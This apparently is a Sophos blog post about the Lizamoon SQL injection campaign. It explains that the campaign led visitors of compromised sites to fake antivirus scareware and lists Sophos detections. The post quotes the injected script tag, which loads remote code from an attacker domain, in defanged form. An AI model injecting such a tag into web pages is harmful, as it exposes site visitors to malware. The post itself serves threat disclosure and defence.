What's the deal with the Lizamoon SQL injection?

Filed Under: Malware, SophosLabs

The moon at about 3/4 phase
There has been a large amount of press in the last few days regarding lizamoon. The following code was injected into a large number of websites:

<script src=hxxp://lizamoon . com / ur . php >

At the time of writing, various other domains are being used, not just lizamoon.

The script that is loaded from the compromised web pages redirects the user to a malicious site. Ultimately, the attack is intended to infect users with fake AV (scareware). The distribution sites used typically use the ".cc" (Cocos Islands) or ".in" (India) TLDs.

Sophos Perspective

SophosLabs have been monitoring these attacks and have protected customers in several ways:

  • detecting the fake AV pages as Mal/FakeAVJS-A
  • detecting the fake AV payload as Mal/FakeAV-IP
  • blocking access to the known sites used in this attack with URL filtering at the endpoint and web gateway

Additionally, detection for web pages injected with the malicious script element has been released today as Troj/Badsrc-L.

Current scope of the problem

If you do a Google search for:

"<script src=http://*/ur.php"

you get a large number of hits.

This frightening volume may be a little misleading, since the total is inflated by occurrences of the following HTML within the compromised web pages:

&lt;script src=hxxp://lizamoon . com / ur . php &gt;

As you can see, the injected code has been escaped in some cases, rendering the injection harmless.

, ,

You might like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

About the author

Paul O Baccas (aka pob) joined Sophos in 1997 after studying Engineering Science at Oxford University. After nearly 16 years, he has left Sophos to pastures new and will be writing as an independent malware researcher. Paul has: published several papers, presented at several Virus Bulletins and was a technical editor for "AVIEN Malware Defense Guide". He has contributed to Virus Bulletin and is a frequent contributor to the NakedSecurity blog.